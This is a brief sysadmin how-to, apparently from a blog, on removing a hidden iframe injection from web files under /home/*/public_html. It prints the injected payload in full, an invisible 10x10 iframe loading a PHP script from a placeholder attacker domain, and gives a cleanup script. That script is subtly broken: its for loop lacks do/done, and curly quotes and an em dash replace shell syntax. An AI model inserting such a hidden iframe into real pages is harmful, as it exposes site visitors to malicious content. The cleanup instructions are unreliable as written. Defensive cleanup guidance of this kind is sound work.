Iframe: How to remove it ?

For iFRME injection, first search the all domains on the server using following command which are infected then remove it using following script.

find /home/*/public_html/ -type f -exec grep -Eil “iframedomain.com” {} \; >> scanresult.txt

Where iframedomain.com is injected domain. Now use following script to remove it.

vi remove.sh and add following

for i in `cat scanresult.txt`;
replace -s ‘<div style=”visibility:hidden”><iframe src=”http://iframedomain.com/phpscript.php” width=10 height=10></iframe></div>’ “” —  $i




Subscribe Now to stay updated.

Please fill in your email address to get most latest updates.